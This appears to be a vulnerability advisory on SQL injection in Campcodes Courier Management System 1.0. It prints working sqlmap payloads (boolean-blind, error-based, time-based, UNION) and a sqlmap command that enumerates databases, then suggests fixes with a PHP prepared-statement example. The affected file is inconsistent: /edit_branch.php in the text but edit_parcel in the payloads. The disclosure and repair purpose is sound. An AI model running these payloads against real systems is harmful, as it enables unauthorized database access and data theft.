| Field | Value |
|---|---|
| Title | Campcodes Courier Management System V1.0 SQL Injection |
| Description | Campcodes Courier Management System V1.0 /edit_branch.php SQL injection |
NAME OF AFFECTED PRODUCT(S)
- Product: Courier Management System
- Vendor Homepage: https://www.campcodes.com/

AFFECTED AND/OR FIXED VERSION(S)
- Submitter: mawenjie
- Vulnerable File: /edit_branch.php
- Version(s): V1.0
- Software Link:
  - https://www.campcodes.com/projects/php/courier-management-system/
  - https://www.campcodes.com/downloads/courier-management-system-source-code/

PROBLEM TYPE
- Vulnerability Type: SQL injection

Root Cause
The /edit_branch.php script of Courier Management System contains a SQL injection vulnerability. The affected query can be attacked with blind injection: an attacker observes the application's response or other visible behaviour to determine whether an injection succeeded, and from there probes and extracts data from the database.
Impact
Attackers can exploit this SQL injection vulnerability to gain unauthorized database access, leak sensitive data, tamper with data, take full control of the system, and even cause service interruption, posing a serious threat to system security and business continuity.
DESCRIPTION
A SQL injection vulnerability was found in /edit_branch.php of Courier Management System. The affected query can be attacked with blind injection: the attacker injects conditional expressions and uses the application's Boolean-condition-based behaviour to learn the contents of the database, trying different conditions and checking each one against the application's response. When building the SQL query, the program uses the user-supplied id directly, without any validation or filtering, so a crafted id value can execute arbitrary SQL queries.
<img width="1580" height="337" alt="Image" src="https://github.com/user-attachments/assets/f1761dc0-bd1c-43fa-865f-d09c696e1be2" />
Vulnerability details and POC
Vulnerability location: 'id' parameter
Payload:

```text
sqlmap resumed the following injection point(s) from stored session:
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: http://x.x.x.x:8093/index.php?page=edit_parcel&id=(SELECT (CASE WHEN (8801=8801) THEN 9 ELSE (SELECT 7661 UNION SELECT 1858) END))

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: http://x.x.x.x:8093/index.php?page=edit_parcel&id=9 OR (SELECT 6471 FROM(SELECT COUNT(*),CONCAT(0x716b717871,(SELECT (ELT(6471=6471,1))),0x71787a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
    Payload: http://x.x.x.x:8093/index.php?page=edit_parcel&id=9 OR SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 18 columns
    Payload: http://x.x.x.x:8093/index.php?page=edit_parcel&id=9 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b717871,0x6b6e517569534a6c6c61504a6742675a77646c7a76467746755274614b4643677a6f74695946626d,0x71787a7a71),NULL,NULL
```
The following screenshot shows some of the information obtained by running the sqlmap tool with this command:

```bash
python3 sqlmap.py -u "http://x.x.x.x:8093/index.php?page=edit_parcel&id=9*" --cookie PHPSESSID=1gtgbhgc1ei9ort2lvlrt4tod2 --dbs
```

<img width="846" height="309" alt="Image" src="https://github.com/user-attachments/assets/d4b2a02c-7c4e-485a-9a12-cfc18295a616" />
Suggested repair
1. Use prepared statements and parameter binding:
Prepared statements prevent SQL injection because they separate the SQL code from the user-supplied data. With a prepared statement, the value entered by the user is treated purely as data and is never interpreted as SQL code.
2. Input validation and filtering:
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. Minimize database user permissions:
Ensure that the account used to connect to the database has only the minimum necessary permissions. Avoid using highly privileged accounts (such as 'root' or 'admin') for day-to-day operations.
4. Regular security audits:
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
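As an added illustration of repairs 1 and 2 (this is not code from the Campcodes project; the `branches` table, its integer `id` column and the open mysqli connection `$conn` are assumptions), the snippet below shows the unsafe pattern the advisory describes, where the request id is concatenated into the query text, next to a hardened version that validates the id and binds it as a parameter:

```php
<?php
// Added example, not the project's code. Assumed: $conn is an open mysqli
// connection and a `branches` table with an integer `id` column exists.

// Unsafe pattern (as described in the advisory): the id from the request is
// concatenated into the SQL text, so the database parses it as SQL, not data.
function loadBranchUnsafe(mysqli $conn, string $id): ?array
{
    $sql = "SELECT * FROM branches WHERE id = " . $id;   // injection point
    $result = $conn->query($sql);
    return $result ? ($result->fetch_assoc() ?: null) : null;
}

// Hardened version: validate the input shape, then bind it as a parameter.
function loadBranchSafe(mysqli $conn, string $id): ?array
{
    // Repair 2: the id must be a positive integer; reject anything else
    // before it reaches the database.
    $branchId = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($branchId === false) {
        http_response_code(400);
        return null;
    }

    // Repair 1: the SQL text is fixed at prepare time; the value travels
    // separately and cannot change the query's structure.
    $stmt = $conn->prepare('SELECT * FROM branches WHERE id = ?');
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $conn->error);
    }
    $stmt->bind_param('i', $branchId);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();   // get_result() needs mysqlnd
    $stmt->close();
    return $row ?: null;
}

// Usage in a page handler: a request whose id is anything but a positive
// integer is rejected by loadBranchSafe before any query runs.
$branch = loadBranchSafe($conn, $_GET['id'] ?? '');
if ($branch === null) {
    exit('Branch not found');
}
```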
| Field | Value |
|---|---|
| Source | https://github.com/XiaoJiesecqwq/CVE/issues/7 |
| User | Anonymous User |
| Submission | 07/25/2025 08:03 AM (6 months ago) |
| Moderation | 07/25/2025 10:40 AM (3 hours later) |
| Status | Accepted |
| VulDB entry | 317599 [Campcodes Courier Management System 1.0 /edit_branch.php ID sql injection] |
| Points | 20 |